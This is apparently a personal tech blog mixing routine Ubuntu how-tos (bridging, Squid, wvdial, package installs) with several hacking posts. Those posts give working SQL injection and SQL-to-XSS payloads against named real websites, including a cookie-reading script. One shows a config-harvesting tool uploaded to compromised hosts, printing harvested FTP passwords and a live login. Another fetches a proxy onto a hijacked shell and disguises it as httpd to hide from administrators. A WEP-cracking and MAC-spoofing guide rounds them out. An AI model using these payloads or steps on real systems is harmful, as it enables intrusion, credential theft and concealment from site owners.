Bridge On ubuntu

I was set up Ubuntu 9.10 karmic koala server as Squid box.
Squid has been installed and work very well, then bridge 2 NIC and configure squid as transparent proxy.


install bridge utils
$ sudo apt-get update
$ sudo apt-get install bridge-utils

edit /etc/rc.local
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
ifconfig br0 192.168.1.2 netmask 255.255.255.0 up
route add default gw 192.168.1.1

#add this rule for configure transparent proxy
iptables -t nat -A PREROUTING -s 192.168.1.1/24 -p tcp --dport 80 -j REDIRECT --to-port 3128

Save and restart

Read more...

Tuxcut [Netcut on Ubuntu]

NetCut is a Software that helps you admin your network by purely on ARP protocol . List IP-MAC Table in secs, turn off & On network on any computer on your LAN including any device like router , switcher. Also, netcut can protected user from ARP SPOOF attack.

Tuxcat is a software work exactly like Necut but run on Ubuntu.

Download latest version of Tuxcat : http://bitbucket.org/a_atalla/tuxcut/downloads/

Installing Tuxcat on Ubuntu Karmic koala

download TuxCut-3.2_all.deb,

$ sudo apt-get install arp-scan
$ sudo apt-get install dsniff
$ sudo dpkg -i TuxCut-3.2_all.deb

running
$ sudo tuxcat

Read more...

Arpon - portect from arp poison

ArpON (Arp handler inspectiON) is a portable handler daemon with some
nice tools to handle all ARP aspects. It has a lot of features and it
makes Arp a bit safer.

This is possible using two kinds of anti Arp
Poisoning tecniques, the first is based on SARPI or "Static Arp Inspec-
tion", the second on DARPI or "Dynamic Arp Inspection" approach. Keep
in mind otheototherherr common tools fighting ARP poisoning usually limit their
activity only to point out the problem instead of blocking it, ArpON
does it using SARPI and DARPI policies. Finally you can use ArpON to
pentest some switched/hubbed LAN with/without DHCP protocol, in fact
you can disable the daemon in order to use the tools to poison the ARP
Cache. However ArpON is also a good tool to a clever sysadmin aware of
security related topics. It is a tool born to make Arp secure in order
to avoid Arp Spoofing/Poisoning & co.

Site: http://arpon.sourceforge.net

Install on Ubuntu:

$ sudo apt-get install arpon

running

$ sudo arpon -y

Read more...

sock proxy on terminal using tsock

How running apt-get through sock proxy?
I use tsock for running apt-get through sock proxy

Installing tsock
$ sudo apt-get install tsock

edit file /etc/tsock.conf

# Default server
# For connections that aren't to the local subnets or to 150.0.0.0/255.255.0.0
# the server at 192.168.0.1 should be used (again, hostnames could be used
# too, see note above)
server = 202.144.2.100
# Server type defaults to 4 so we need to specify it as 5 for this one
server_type = 5
# The port defaults to 1080 but I've stated it here for clarity
server_port = 1080

then you can run apt-get through sock proxy with command

$ sudo tsocks apt-get update

Read more...

Linux Omnia XP

Omnia 1.2-2 Live CD is available for download, remember that these are test versions for final release candidate, 1.2-2. Softwares: Firefox, Terminal Server Client, Plugins Java and Flash, Pidgin.

Omnia Linux is a remastering of the Linux Debian 5.0 Lenny, with visual interface easily adapted for deployment in small business and end users by facilitating the migration to the Linux world. It supports a total of 12 architectures and runs from a live CD with an option for installing to a hard disk.

Download links is: http://www.omnialinux.com/isos/1.2-2/omnia1.2-2alpha.iso

MD5
50b550f5da36d1b5bb3d3d8dd759a8d8

Password user Omnia: omnia
Password root: omnia

Screenshots
http://omnialinux.com/omniaxp/?page_id=61

Read more...

Squid and facebook

friend : bro kok facebook sering blank page ya udah 3 hari ini di tempatku
me : sama neeh bro tempat gw juga
me : tuh mungkin problemnya ada di squid yang nggak bersahabat ama facebook
friend : trus gimana ada solusi?
me : kalau gw buat rule iptables supaya facebook nggak masuk cache squid

nslookup facebook.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
Name: facebook.com
Address: 69.63.187.17
Name: facebook.com
Address: 69.63.187.19
Name: facebook.com
Address: 69.63.181.11
Name: facebook.com
Address: 69.63.181.12
Name: facebook.com
Address: 69.63.184.32
Name: facebook.com
Address: 69.63.184.142

iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.187.17 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.187.19 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.12 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.142 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.11 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -d 69.63.181.32 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -s facebook.com -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -s www.facebook.com -j ACCEPT
iptables -t nat -A PREROUTING -s 192.168.0.1/24 -p tcp --dport 80 -j REDIRECT --to-port 3128

Read more...

EDIT-X BLIND SQL INJECTION

================================================
scripts : Edit-x
Vendor : http://www.edit-x.com
Discovered by : irvian
================================================

http://site.com/index.php?w=6%27+and+1=1/* <-- true
http://site.com/index.php?w=6%27+and+1=2/* <-- false

http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=4/* <-- true
http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=5/* <-- false


Admin login:
http://site.com/editx/index.php

victim:
http://www.maddockpro.com

Read more...

ubuntu

Read more...

SSH Tunnel MAC OS X

SSH tunnel di MAC OSX pada dasarnya sama seperti di Linux.
Langsung saja..

• click finder di dock


• click application


• masuk ke folder Utilities


• dan pilih terminal.

Di terminal ketik

ssh -D [port] -l [username] [hostname]


Keterangan:
port = port tunnel
username = user login SSH server
hostname = Ip atau hostname SSH server

Contoh:
ssh -D 1080 -l root 10.10.21.1


Kemudian di tanya password, masukan password SSH server.

Tinggal pasang aja 127.0.0.1 port 1080 sock5.

Read more...

XSS dari SQL Injection

Nyoba XSS dari SQL injection!!!!
Cukup mudah tinggal rubah code javascript ke bentuk ASCII dan masukan ke dalam SQL injection.

Contoh:

String:
< script>alert('irvian')< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62)

Untuk mempermudah gunakan tool di perl di http://h1.ripway.com/irvian/ascii.txt

Penerapan pada target

Target:
http://www.cpme.be

Vuln SQL:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,1,2,3/*

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62%29,3'

Jika muncul textbox irvian berarti javascript berhasil di load.

String:
< script>alert(document.cookie)< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62%29,3'

terlihat textbox mengeluarkan isicookies.


sumber:
http://milw0rm.com/papers/363

Read more...

Install Firefox 3.5 on Ubuntu

Install Firefox 3.5 on Ubuntu.

Edit /etc/apt/sources.list and add the following launchpad repo.

For Ubuntu Hardy

deb http://ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu hardy main

For Ubuntu Jaunty

deb http://ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu jaunty main

And then do this command

$sudo apt-get update
$sudo apt-get install firefox-3.5

Run firefox 3.5 on Applications > Internet > Shiretoko Web Browser

Read more...

repository ubuntu feisty

Ubuntu Ubuntu 7.04 (Feisty Fawn) repository move to old-releases.ubuntu.com.

So...

edit /etc/sources.list and add the following launchpad

deb http://old-releases.ubuntu.com/ubuntu/ feisty main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-updates main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-security main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-proposed main restricted universe multiverse

and then update

$ sudo apt-get update

Read more...

Server yahoo messenger

Beberapa waktu yang lalu saya mendapat banyak sekali pertanyaan dari teman - teman pengguna pidgin di Linux (Ubuntu).

Rata - rata mereka bertanya kenapa tidak bisa chatting di yahoo dengan pidgin?
Masalah ini timbul karena server default yahoo messenger di pidgin sedang bermasalah.

Maka solusi termudah adalah dengan menggantinya dengan server lain.

Berikut adalah daftar server yahoo messenger yang dapat di coba untuk menggatikan server default di pidgin

cn.scs.msg.yahoo.com
scs.msg.yahoo.com
scsa.msg.yahoo.com
scsb.msg.yahoo.com
scsc.msg.yahoo.com
scsd.msg.yahoo.com
scsf.msg.yahoo.com
vcs1.msg.yahoo.com
vcs2.msg.yahoo.com
mcs.msg.yahoo.com

sedangkan port dapat di coba dengan 5050 8001 8002

Read more...

GeoCities is closing

Yahoo! GeoCities Service Announcement
Important notice: GeoCities is closing.
Dear Yahoo! GeoCities customer,

We're writing to let you know that Yahoo! GeoCities, our free web site building service and community, is closing on October 26, 2009.

On October 26, 2009, your GeoCities site will no longer appear on the Web, and you will no longer be able to access your GeoCities account and files.

What You Need to Do

If you'd like to move your web site, or save the images and other files you've posted online, you need to act now by choosing one of the following options:

• Move your site to Yahoo! Web Hosting.
We know your files are important to you, and we want to make moving to Web Hosting as easy and affordable as we can. For a limited time, you can move your files automatically, take advantage of terrific features like a personalized domain name and email, even redirect your GeoCities web address to your new site — all for only $4.99 a month for a full year.

For more information and complete terms, please see our special offer now.

• Download your files to your own computer.
With your pages and images saved offline, you can re-create your site with any hosting provider.

To quickly download your published files, visit your GeoCities web site, right-click on each page, and choose Save Page As... from the menu that appears. Choose a location on your computer to save your files, then click OK or Save. Learn more about downloading your files.

Don't Wait
Please be aware that after October 26, your GeoCities files will be deleted from our servers, and will not be recoverable. If you'd like to save your files, you must download them now or move to Yahoo! Web Hosting. If you need assistance, please visit the help center.

We want to thank you for being a GeoCities customer, and hope you continue to enjoy our other Yahoo! services.

Best regards,

The Yahoo! GeoCities team

Read more...

pidgin facebook plugin

Seiring dengan populernya facebook pengen juga chat di facebook via IM,
langsung ajaaa...

so pasti pidgin sudah terinstall dengan baik di distro ubuntu, kini tinggal menambahakan plugin facebook,

pidgin dapat di download di http://www.pidgin.im

untuk jaunty.

sudo apt-get install libjson-glib-1.0-0
wget http://pidgin-facebookchat.googlecode.com/files/pidgin-facebookchat-1.52.deb
sudo dpkg -i pidgin-facebookchat-1.52.deb

untuk hardy

wget http://debian.rab.co.id/intrepid/pool/universe/j/json-glib/libjson-glib-1.0-0-dbg_0.6.2-3_i386.deb
wget http://pidgin-facebookchat.googlecode.com/files/pidgin-facebookchat-1.52.deb
sudo dpkg -i libjson-glib-1.0-0-dbg_0.6.2-3_i386.deb
sudo dpkg -i pidgin-facebookchat-1.52.deb

untuk penguna windows atau distro lain silahkan kunjungi

http://code.google.com/p/pidgin-facebookchat

Read more...

ZSnes without sound in Ubuntu Hardy Heron

ZSnes without sound in Ubuntu Hardy Heron

While we have not a solution for this bug, there’s a workaround to play zsnes with sound in Ubuntu Hardy Heron (aka Ubuntu 8.04).


zsnes -ad sdl romname

Just go to System –> Preferences –> Main Menu.
Select Games, go to ZSNES Emulator, choose Preferences, and set the command to zsnes -ad sdl.
Or, you can launch the GUI from the command line.
To do that, just type zsnes -ad sdl instead of typing zsnes -ad sdl romname.

Read more...

Linux Wireless Hacking

informasi dan Pengetahuan Tentang Wireless Hacking di Linux ini diperuntukan sebagai pembelajaran semata. Bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan sendiri dengan aparat penegak hukum.

Ada tiga (3) objektif / tujuan teknik yang akan di terangkan disini, yaitu,
- Teknik membobol WEP
- Teknik membobol MAC filter.
- Teknik melihat Hidden SSID

Asumsi
- Chipset Wireless yang digunakan adalah Intel, seperti, ipw2200. Kalau anda cukup beruntung
menggunakan chipset Atheros anda dapat melakukan hal-hal yang lebih dahsyat.

Aplikasi yang perlu disiapkan.
Beberapa paket software yang dibutuhkan

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Scanning Hotspot
Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.

iwlist
Cara yang paling sederhana adalah menggunakan perintah

# iwlist scanning

Kismet
cara yang lebih rumit menggunakan kismet

# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
source=none,none,addme --> source=ipw2200,eth1,ipwsource

Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet

# kismet

airodump
Mematikan mode monitor di WLAN interface eth1

# airmon-ng stop eth1

Mengaktifkan mode monitor di WLAN interface eth1
# airmon-ng start eth1

Scanning melalui WLAN interface eth1

# airodump-ng eth1

Menjebol WEP menggunakan airodump dan aircrack
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini
membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan
susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu,

(1) BSSID / MAC Addresss AP
(2) MAC address WLAN kita
(3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1

Jalankan airodump di WLAN eth1

# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.

Melewati Pembatasan Mac Address
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di
ijinkan lewat oleh AP menggunakan Kismet adalah

# kismet

Lakukan space

S - untuk men-sort
S - untuk men-sort terhadap SSID
Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja & MAC address client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1
# airmon-ng stop eth1
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang
diijinkan AP

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain

# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1

Menemukan Hidden SSID
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <>.

Ditulis oleh: Onno W. Purbo, X-code Magazine

Read more...

Download video on youtube with Linux

Actually with Linux you can easy download video on youtube.
I have 2 way for download video on youtube with Ubuntu.


Frist (without tool)

After you watching video on youtube with your browser (mozila or opera) until done,
you can find out video with this method.
Go to home directory and enter crl+H then you will be see hidden file and directory

If use Mozilla go to directory .mozila/firefox/0y3ysrwn.default/Cache and find out video

If use Opera go to directory .opera/cache4 and find out video

Second (with slimrat)

Slimrat is perl tool, before use slimrat you must be make sure this perl module has been installed.

$ sudo apt-get install libwww-mechanize-perl libgtk2-gladexml-perl

Then download slimrat tools on http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

$ wget http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

extract slimrat-0.9.4.tar.bz2

$ tar -lxvf slimrat-0.9.4.tar.bz2

go to directory slimrat-0.9.4

$ cd slimrat-0.9.4

now you can easy download video on youtube with command

$ ./slimrat http://www.youtube.com/watch?v=blablabla


enjoy!!

Read more...

Stopping Proccess from DOS prompt

Oftentimes we are using task manager to stop/kill proccess on Windows operating system.
Besides that way, you can using DOS prompt to stop/kill proccess on windows. This is the how to do that.

1. Enter DOS prompt, you can go to start menu -> run and then type ‘cmd’
2. Type “tasklist” without quote and press enter, and it will appear the list of processes running as bellow

3. Choose the application that you want to stop/kill and then find the PID number of that application
4. Type “tskill ” to kill the proccess

Read more...

Multiple Login Yahoo! Messenger

Yahoo Messenger (YM) is one of the most used to chat. Beside YM, people maybe used MSN, ICQ, Skype etc. Here i will give some tutorial how to login more than one account YM in 1 computer on windows (just for Yahoo! Messenger).
Let’s Begin

1. Run registry editor. Start Menu -> Run, then type regedit and press enter.
2. Find this folder in the left of registry menu HKEY_CURRENT_USERSoftwareYahooPagerTest
3. In the right panel, right click mouse and choose New - Dword Value
4. Type Plural
5. Double click that Plural and filled it with 1

It’s finished all :D. You can sign in with 2 Yahoo account in 1 computer.

Read more...

PhpConfigSpy v0.2 - Scan and Grab Login

PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported ssh) and maybe database login.
Most of us, after getting a web target (Via inject PHP) we will use that web only for BOT (EGGDROP, PSYBNC). Why we do not try to get full access to the Web target.
Let’s we try to get some information login from web target with PhpConfigSpy tool.

Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of scaning :
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Binggo… That is success !!!
You can check that username via FTP or SSH (if target supported SSH)
Let we check together for this login
[FTP] bsidenet:bside123 Success
That’s mean user : bsidenet and password : bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It’s Work

Read more...

Install proxy

You have ssh shell or target shell inject ? and you don’t know for what that shell ??
I will try to assist you how to make proxy using that ssh. First, get the source of proxy.tgz
If you using shell inject, you must find directory that have permission 777 (drwxrrwxrwx) with this command “find / - tipe d -perm 777″.
Look the step by step to build proxy bellow :

[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
–01:30:35– http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com… 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz’

100%[=======================================>] 54,004 –.-K/s in 0.04s

01:30:35 (1.21 MB/s) - `proxy.tgz’ saved [54004/54004]

[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox

[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr–r– 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132

Proxy already done and ready to use. Use the IP of ssh shell and 2020 for port.
That proxy is running using fakename ./httpd to blind the real administrator.
If you want to kill that proxy you can kill by PidNum (20132) using this command “kill -9 20132″.

Read more...

Ubuntu Hardy Heron - Installing OpenOffice 3.0.1

Singkat kata kenapa saya harus menginstal openoffice 3 di Ubuntu Hardy Heron yaitu karena openoffice 2 tidak dapat membaca file dari Microsoft office 2007 seperti docx dan beberapa bug yang ada di openoffice 2 telah di perbaiki di dalam openoffice 3.

langsung saja,

Uninstall terlebih dahulu openoffice 2

$ sudo apt-get --purge autoremove openoffice.org-core

Delete folder .openoffice yang berada di decertory home

$ sudo rm -rf /home/user/.openoffice.org

Download file openoffice 3

$ wget http://kambing.ui.edu/openoffice/stable/3.0.1/OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Setelah selesai, lalu extract

$ tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Masuk ke dalam directory hasil extract tadi

$ cd OOO300_m15_native_packed-1_en-US.9379/DEBS

install

$ sudo dpkg -i *.deb
$ cd desktop-integration/
$ sudo dpkg -i *.deb

Selesai !!!
Sekarang Openoffice 3.0.1 sudah terinstal di Ubuntu Hardy Heron.

Read more...

Gyach di ubuntu jaunty dengan repository linuxmint

Install gyach di ubuntu jaunty lebih mudah pakai repository Linuxmint.
Masuk System/Administration/sofware-sources pada tab Thrid-Party Sofware
klik add kemudian pada APT line masukan
deb http://packages.linuxmint.com felicia main upstream import community

Go to terminal!!

$ sudo apt-get update
$ sudo apt-cache search gyach
gyachi - A Linux client for the Yahoo! Messenger protocol written using GTK+ GUI toolkit

$ sudo apt-get install gyachi

Read more...

Ubuntu di Laptop PANASONIC CF-W4

Kali ini coba install Ubuntu 9.04 atau yang di kenal dengan nama jaunty di laptop PANASONIC CF-W4,

Proses instalasi berjalan dengan normal dan tidak ada masalah.
Semua driver sudah terdeteksi, namun ketika mengunakan hotkey untuk mengatur volume(fn+f6/f5), contras(fn+f1/f2), mute(fn+f4), dsb ternyata tidak jalan.

Setelah browsing - browsing dan baca baca ahkirnya ketemulah jalan terangnya :D


Pertama perlu menginstal git core

$ sudo aptitude install git-core

kemudian checkout module

$ git clone git://git.myrix.net/pana_acpi

complie dan install

$ cd pana_acpi
$ make
$ make install

kemudian jalankan perintah cp untuk mengcopy file

$ sudo cp pana_acpi/acpi/* /etc/acpi

restart acpid daemon

$ sudo /etc/init.d/acpid restart

jalankan

modprobe panasonic-laptop

hotkey sekarang sudah jalan :)

Supaya modprobe di load saat booting silahkan tambahkan "modprobe panasonic-laptop" pada file /etc/rc.local

Read more...

ADSL Connection di Ubuntu

Koneksi internet menggunakan Speedy di Ubuntu,

1. Ketik

~ $ sudo pppoeconf

2. Jawab semua pertanyaan, masukan nomor Speedy dan password.

3. Untuk connect ketik perintah

~ $ sudo pon dsl-provider

4. Untuk disconnect ketik

~ $ sudo poff dsl-provider

Read more...

Wvdial

Aaaaah speedy mati lagi. padahal pengen online. hiks hiks hiks.
Ya sudah lah coba pakai gprs Mentari.

Keterangan.
OS : Ubuntu 8.04
Hp : Nokia N78

Langsung coba tancapkan kabel usb data N78 ke pc dan pilih opsi Pc suite di Hape. Seperti biasanya karena sudah terbiasa kalau ada hardware baru aku langsung ketik perintah dmesg

[26908.552434] usb 5-6: new high speed USB device using ehci_hcd and address 18
[26908.685357] usb 5-6: configuration #1 chosen from 1 choice
[26908.693603] cdc_acm 5-6:1.0: ttyACM0: USB ACM device

ternyata hape saya sudah dikenal di linux dengan nama ttyACM0.
langsung aja edit file /etc/wvdial.conf seperti dibawah ini

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"ip","indosatgprs"
Check Def Route = on
Phone = *99***1#
Idle Seconds = 0
Auto DNS = on
Abort on Busy = off
Abort on No Dialtone = on
Modem Type = USB Modem
Stupid Mode = on
Baud = 460800
New PPPD = yes
Modem = /dev/ttyACM0
ISDN = 0
Username = indosat
Password = indosat
Carrier Check = on

Setelah selesai save dan jalankan perintah wvdialconf

~ $ sudo wvdialconf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

ttyS0<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyS0<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 115200 baud
ttyS0<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
Modem Port Scan<*1>: S1 S2 S3
WvModem<*1>: Cannot get information for serial port.
ttyACM0<*1>: ATQ0 V1 E1 -- OK
ttyACM0<*1>: ATQ0 V1 E1 Z -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyACM0<*1>: Modem Identifier: ATI -- MTK2
ttyACM0<*1>: Speed 4800: AT -- OK
ttyACM0<*1>: Speed 9600: AT -- OK
ttyACM0<*1>: Speed 19200: AT -- OK
ttyACM0<*1>: Speed 38400: AT -- OK
ttyACM0<*1>: Speed 57600: AT -- OK
ttyACM0<*1>: Speed 115200: AT -- OK
ttyACM0<*1>: Speed 230400: AT -- OK
ttyACM0<*1>: Speed 460800: AT -- OK
ttyACM0<*1>: Max speed is 460800; that should be safe.
ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found an USB modem on /dev/ttyACM0.
Modem configuration written to /etc/wvdial.conf.
ttyACM0: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

Now its time for connect internet :D
tanpa ragu langsung saja jalankan perintah wvdial

~ $ sudo wvdial
--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Sending: AT+CGDCONT=1,"ip","indosatgprs"
AT+CGDCONT=1,"ip","indosatgprs"
OK
--> Modem initialized.
--> Sending: ATDT*99***1#
--> Waiting for carrier.
ATDT*99***1#
CONNECT
~[7f]}#@!}!} } }2}"}&} } } } }#}$@#}'}"}(}"R[04]~
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Sun Jan 11 17:54:48 2009
--> Pid of pppd: 9957
--> Using interface ppp0
--> pppd: 0�[06][08]
--> pppd: 0�[06][08]
--> pppd: 0�[06][08]
--> pppd: 0�[06][08]
--> pppd: 0�[06][08]
--> local IP address 10.35.177.37
--> pppd: 0�[06][08]
--> remote IP address 10.64.64.64
--> pppd: 0�[06][08]
--> primary DNS address 124.195.15.98
--> pppd: 0�[06][08]
--> secondary DNS address 124.195.15.100
--> pppd: 0�[06][08]

Sukses !!! sekarang coba lakukan ping

Read more...